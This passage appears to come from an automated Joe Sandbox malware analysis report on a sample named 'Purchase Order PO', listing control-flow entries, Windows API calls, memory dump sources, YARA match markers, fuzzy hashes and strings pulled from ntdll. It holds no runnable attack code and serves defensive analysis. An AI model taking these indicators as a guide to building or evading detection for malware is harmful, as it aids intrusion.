                                                                                                                            • Opcode ID: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                                                                                            • Instruction ID: 9a34639f9b590f445554bb3374e68085bc2f8b1a53e3d8f22fb1199bbd37af40
                                                                                                                            • Opcode Fuzzy Hash: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                                                                                            • Instruction Fuzzy Hash: E6E06D72604205BBD614EF59EC85FAB37ADDFC9714F004419FE18A7242C671B9118AB8

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 371 42c993-42c9d4 call 404783 call 42d8c3 RtlAllocateHeap
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.NTDLL(?,0041E4EE,?,?,00000000,?,0041E4EE,?,?,?), ref: 0042C9CF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2131373286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order PO.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1279760036-0
                                                                                                                            • Opcode ID: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                                                                                            • Instruction ID: 36e320101d405b986edb5f0360d5375c690b058552b8fab17163e86361dfcef2
                                                                                                                            • Opcode Fuzzy Hash: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                                                                                            • Instruction Fuzzy Hash: D6E06DB2604204BBD714EE99EC41EAB77ACDFC5750F004419FD18A7282D671B9108BB9

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 381 42ca33-42ca6c call 404783 call 42d8c3 ExitProcess
                                                                                                                            APIs
                                                                                                                            • ExitProcess.KERNEL32(?,00000000,00000000,?,5B435AB9,?,?,5B435AB9), ref: 0042CA67
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2131373286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Purchase Order PO.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 621844428-0
                                                                                                                            • Opcode ID: 898f235de1112ca79113d7bdd050537dfc5d7c103be820d62ecc6fe10eccdd2d
                                                                                                                            • Instruction ID: e0f95e071271af0ef5bae3a3abc99ff131e4bcb123f1ba6cdcf3cfbd638433f3
                                                                                                                            • Opcode Fuzzy Hash: 898f235de1112ca79113d7bdd050537dfc5d7c103be820d62ecc6fe10eccdd2d
                                                                                                                            • Instruction Fuzzy Hash: 4CE04F766002187BD220AA9AEC41F97775CDFC9714F50441AFA1867182C6717A1586A4

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 386 1ad2c0a-1ad2c0f 387 1ad2c1f-1ad2c26 LdrInitializeThunk 386->387 388 1ad2c11-1ad2c18 386->388
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: d6770ca066eff0ccce02a38b610614372139a8a3501d59d1847aa34a8f753b72
                                                                                                                            • Instruction ID: 51208426774534202d37fa738632684cee007ab4cf82f1d5bc401608c1fad914
                                                                                                                            • Opcode Fuzzy Hash: d6770ca066eff0ccce02a38b610614372139a8a3501d59d1847aa34a8f753b72
                                                                                                                            • Instruction Fuzzy Hash: 4BB09B719019C5C5DA12E764460C717794077D0701F16C072D2030741F473CC5D1E275
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                            • API String ID: 0-2160512332
                                                                                                                            • Opcode ID: 1fc3f134e777ddff8aaef40082b6f72348a25b55a20942295a3cae7fb29a40cd
                                                                                                                            • Instruction ID: bfe61eb9a850fc7a76844b26b25f8119dadf4bd5d7dcc0a7647c429a80330078
                                                                                                                            • Opcode Fuzzy Hash: 1fc3f134e777ddff8aaef40082b6f72348a25b55a20942295a3cae7fb29a40cd
                                                                                                                            • Instruction Fuzzy Hash: 6892CD71604342AFE729DF28C880B6BB7E8FB84710F9549ADFA94D7254D770E844CB92
                                                                                                                            Strings
                                                                                                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01B054CE
                                                                                                                            • 8, xrefs: 01B052E3
                                                                                                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01B0540A, 01B05496, 01B05519
                                                                                                                            • Invalid debug info address of this critical section, xrefs: 01B054B6
                                                                                                                            • Address of the debug info found in the active list., xrefs: 01B054AE, 01B054FA
                                                                                                                            • Critical section address., xrefs: 01B05502
                                                                                                                            • Thread identifier, xrefs: 01B0553A
                                                                                                                            • Critical section debug info address, xrefs: 01B0541F, 01B0552E
                                                                                                                            • undeleted critical section in freed memory, xrefs: 01B0542B
                                                                                                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01B054E2
                                                                                                                            • double initialized or corrupted critical section, xrefs: 01B05508
                                                                                                                            • Thread is in a state in which it cannot own a critical section, xrefs: 01B05543
                                                                                                                            • corrupted critical section, xrefs: 01B054C2
                                                                                                                            • Critical section address, xrefs: 01B05425, 01B054BC, 01B05534
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                            • API String ID: 0-2368682639
                                                                                                                            • Opcode ID: b5aee963a79406d26dfda9e0afeb974a11ba882f61d92cc4ac15e3d4299170c8
                                                                                                                            • Instruction ID: b45810d56d4faafd99774ed642c09ced548e272a0c262e6cb4ca8ba61636a363
                                                                                                                            • Opcode Fuzzy Hash: b5aee963a79406d26dfda9e0afeb974a11ba882f61d92cc4ac15e3d4299170c8
                                                                                                                            • Instruction Fuzzy Hash: 768189B1A00349BFEB25CF99CC45BAEBBB9FB08B14F104159E505B7690D3B9A940CB60
                                                                                                                            Strings
                                                                                                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01B022E4
                                                                                                                            • @, xrefs: 01B0259B
                                                                                                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01B02624
                                                                                                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01B02498
                                                                                                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01B02602
                                                                                                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01B025EB
                                                                                                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 01B0261F
                                                                                                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01B02506
                                                                                                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01B02412
                                                                                                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01B02409
                                                                                                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01B024C0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                            • API String ID: 0-4009184096
                                                                                                                            • Opcode ID: e148ee8ad654b281252402bbadeedf300da25f03d385c8cf6aea7b6e26859ec4
                                                                                                                            • Instruction ID: 9cbc31c0c30c3a6d76e63d09f4b279da0c514291f1d8ca44d9677d48660ee820
                                                                                                                            • Opcode Fuzzy Hash: e148ee8ad654b281252402bbadeedf300da25f03d385c8cf6aea7b6e26859ec4
                                                                                                                            • Instruction Fuzzy Hash: 0C0290B1D042299FDB35DB54CD84BEAB7B8AF44704F4441EAE609A7281DB309F88CF59
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                            • API String ID: 0-2515994595
                                                                                                                            • Opcode ID: 32bcc65f16ab74d3a6c52dbd9bef8e297e4ab5d1c0befbb321c79ca87b80773e
                                                                                                                            • Instruction ID: 6db5a2c0ffce5528d2d5b00999a67c4b446edbec0d046231af43b08ec04279d8
                                                                                                                            • Opcode Fuzzy Hash: 32bcc65f16ab74d3a6c52dbd9bef8e297e4ab5d1c0befbb321c79ca87b80773e
                                                                                                                            • Instruction Fuzzy Hash: 5951ED711143029BC72ACF688948BABBBECFFD4644F540A5DF999C3240E770D654CB92
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                            • API String ID: 0-1700792311
                                                                                                                            • Opcode ID: aded1e8134f965be160e3e63976d21c491084fb0b89704ec630262ff422ac0fc
                                                                                                                            • Instruction ID: d918c031e51a2e4fa2607ea42dd272eb5a18d3b750cdca228f0b291db4c8a99a
                                                                                                                            • Opcode Fuzzy Hash: aded1e8134f965be160e3e63976d21c491084fb0b89704ec630262ff422ac0fc
                                                                                                                            • Instruction Fuzzy Hash: 3BD1BD35500686EFDB2AFF68C440AEEBBF1FF59A10F08C099F6469B252C7349941DB54
                                                                                                                            Strings
                                                                                                                            • VerifierDebug, xrefs: 01B18CA5
                                                                                                                            • VerifierFlags, xrefs: 01B18C50
                                                                                                                            • HandleTraces, xrefs: 01B18C8F
                                                                                                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01B18A3D
                                                                                                                            • AVRF: -*- final list of providers -*- , xrefs: 01B18B8F
                                                                                                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01B18A67
                                                                                                                            • VerifierDlls, xrefs: 01B18CBD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                            • API String ID: 0-3223716464
                                                                                                                            • Opcode ID: 1e45485619f111d1a9e8c45d2bc5dcbc0e26b6c1a07d41fab7ff78b1dfe203be
                                                                                                                            • Instruction ID: cfcb486778eb092342109dd72db595da06593f60a98bcc1e5da59349190ac325
                                                                                                                            • Opcode Fuzzy Hash: 1e45485619f111d1a9e8c45d2bc5dcbc0e26b6c1a07d41fab7ff78b1dfe203be
                                                                                                                            • Instruction Fuzzy Hash: E6913B72601706EFD739EF68C880B5BBBA8FB54B14F86059CFA41AB259C7309D00C791
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                            • API String ID: 0-1109411897
                                                                                                                            • Opcode ID: 296491222ac28d6898a48125f9fe530ae26256a0c3dd89cacbb1a7abe6d9fc13
                                                                                                                            • Instruction ID: dd13cc2859c48a1e91b32a534bdd79d1f6ce9c79c5dd29c68b359262dcd24e19
                                                                                                                            • Opcode Fuzzy Hash: 296491222ac28d6898a48125f9fe530ae26256a0c3dd89cacbb1a7abe6d9fc13
                                                                                                                            • Instruction Fuzzy Hash: 78A23A74A0562A8FDF64DF58CD887AABBB5AF49304F1442E9E60DA7251DB309EC4CF40
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                                                            • API String ID: 0-4098886588
                                                                                                                            • Opcode ID: 4da8359bf0f056f6d4b51fed29a176c843f51fe462780b4543e15370f6853e88
                                                                                                                            • Instruction ID: fbb55be4725a9324ce063efd8b25fcb2b725258f4c6f422800b249a1499e9d37
                                                                                                                            • Opcode Fuzzy Hash: 4da8359bf0f056f6d4b51fed29a176c843f51fe462780b4543e15370f6853e88
                                                                                                                            • Instruction Fuzzy Hash: 5132AD71A042698BEF22CB58D898BEEBBF5BF44340F1441EAE949A7251D7319EC1CF50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                            • API String ID: 0-792281065
                                                                                                                            • Opcode ID: 5e483d4949dbe1db8018fabf5675c37872e0876c6e254f83047ab63b626523a0
                                                                                                                            • Instruction ID: 7fe45b87a25eef79586cc02a9145af440725b865b4d08794a8ec6338885acb7f
                                                                                                                            • Opcode Fuzzy Hash: 5e483d4949dbe1db8018fabf5675c37872e0876c6e254f83047ab63b626523a0
                                                                                                                            • Instruction Fuzzy Hash: C491F370B003159BEB3ADF18DA45BAEBFA1FB54F24F1401ADEA096B2D2D7709841C791
                                                                                                                            Strings
                                                                                                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01AE9A01
                                                                                                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01AE9A2A
                                                                                                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01AE99ED
                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01AE9A11, 01AE9A3A
                                                                                                                            • LdrpInitShimEngine, xrefs: 01AE99F4, 01AE9A07, 01AE9A30
                                                                                                                            • apphelp.dll, xrefs: 01A86496
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                            • API String ID: 0-204845295
                                                                                                                            • Opcode ID: f8510a8f7f732c2661f16d1b596cc584af437c7939c74e497ce476620429d26b
                                                                                                                            • Instruction ID: b175427d0068492faebdda56ef7e46388e83ae0fbc3212c33870cc7583520849
                                                                                                                            • Opcode Fuzzy Hash: f8510a8f7f732c2661f16d1b596cc584af437c7939c74e497ce476620429d26b
                                                                                                                            • Instruction Fuzzy Hash: E1519F71208305AFE725EF24D985BABB7E8FF84A48F04091EF58997161D730E945CB92
                                                                                                                            Strings
                                                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01B08181, 01B081F5
                                                                                                                            • LdrpInitializeImportRedirection, xrefs: 01B08177, 01B081EB
                                                                                                                            • LdrpInitializeProcess, xrefs: 01ACC6C4
                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01ACC6C3
                                                                                                                            • Loading import redirection DLL: '%wZ', xrefs: 01B08170
                                                                                                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 01B081E5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                            • API String ID: 0-475462383
                                                                                                                            • Opcode ID: 331edb6084bc2945bf3a62d00612e65d2165dfb813eff109a2c66229e44c53f4
                                                                                                                            • Instruction ID: 78cab473fffcf88d888d18aafa1ab707f2b7ffd408b14d54a2867b57fe17524f
                                                                                                                            • Opcode Fuzzy Hash: 331edb6084bc2945bf3a62d00612e65d2165dfb813eff109a2c66229e44c53f4
                                                                                                                            • Instruction Fuzzy Hash: E4312571644342AFC224EF29DE85E1A7BD4FF94F20F04059CF8446B291D720ED04C7A2
                                                                                                                            Strings
                                                                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01B02178
                                                                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01B02180
                                                                                                                            • RtlGetAssemblyStorageRoot, xrefs: 01B02160, 01B0219A, 01B021BA
                                                                                                                            • SXS: %s() passed the empty activation context, xrefs: 01B02165
                                                                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01B021BF
                                                                                                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01B0219F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                            • API String ID: 0-861424205
                                                                                                                            • Opcode ID: 42bf2dcd23c012f058aeaeb05da6fb4a6e592f4b27edcf7b5780ef9253f4a380
                                                                                                                            • Instruction ID: 2ddfab24c1c009d9c174692907a9b709472de855aba0f1de4a73014d793737a5
                                                                                                                            • Opcode Fuzzy Hash: 42bf2dcd23c012f058aeaeb05da6fb4a6e592f4b27edcf7b5780ef9253f4a380
                                                                                                                            • Instruction Fuzzy Hash: 96310936F40225B7FB269A9ACC89F6A7F78EB54E50F0540EEBB04B7140D3709A01C6E1
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 01AD2DF0: LdrInitializeThunk.NTDLL ref: 01AD2DFA
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AD0BA3
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AD0BB6
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AD0D60
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AD0D74
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1404860816-0
                                                                                                                            • Opcode ID: 87ed5b0799cfdeaf4cb2f92e25e4e4ee40edb51c1cebb727117ecd564cfe4ab3
                                                                                                                            • Instruction ID: f623f6f3169e012a35bb6f203049b3e75979300bccf4b00d7547cf3bbd983bed
                                                                                                                            • Opcode Fuzzy Hash: 87ed5b0799cfdeaf4cb2f92e25e4e4ee40edb51c1cebb727117ecd564cfe4ab3
                                                                                                                            • Instruction Fuzzy Hash: C7426E75900715DFDB25CF28C940BAABBF5FF44314F1445AAE98ADB242D770AA84CF60
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                            • API String ID: 0-379654539
                                                                                                                            • Opcode ID: 3662992d03fee212990876f7bbf20ed83f5f1c34828dd63cda911a65f8321f11
                                                                                                                            • Instruction ID: d8771199b1754589d7559657562bcc7c4ac0c79ca38dc9f6e0465070ff7a21c7
                                                                                                                            • Opcode Fuzzy Hash: 3662992d03fee212990876f7bbf20ed83f5f1c34828dd63cda911a65f8321f11
                                                                                                                            • Instruction Fuzzy Hash: 95C16B75208382CFDB11DF68C144B6AB7F4BF85704F04896EFA968B251E734C989CB96
                                                                                                                            Strings
                                                                                                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01AC855E
                                                                                                                            • LdrpInitializeProcess, xrefs: 01AC8422
                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01AC8421
                                                                                                                            • @, xrefs: 01AC8591
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                            • API String ID: 0-1918872054
                                                                                                                            • Opcode ID: a4167eb14839a0b12a8b1ab42dc2d1417c74081d90c3d92cf158da7cea42fe78
                                                                                                                            • Instruction ID: a18d17cfa033f5913eaba1c5d979ec4b0bbd2ddf252faa7f695462e202f0ba23
                                                                                                                            • Opcode Fuzzy Hash: a4167eb14839a0b12a8b1ab42dc2d1417c74081d90c3d92cf158da7cea42fe78
                                                                                                                            • Instruction Fuzzy Hash: 79917C71508345AFDB22DF25CD40FABBAECFF98A44F40092EFA8596151E374D944CB62
                                                                                                                            Strings
                                                                                                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01B021D9, 01B022B1
                                                                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01B022B6
                                                                                                                            • SXS: %s() passed the empty activation context, xrefs: 01B021DE
                                                                                                                            • .Local, xrefs: 01AC28D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                            • API String ID: 0-1239276146
                                                                                                                            • Opcode ID: 02eacbe66722adcfad81422518dd18b1ee765e88936b9395cdbd0413cef3bac5
                                                                                                                            • Instruction ID: 11b655ba4fd87ad1a334207eea52f452310a4215ed8d34cee808a768b9300509
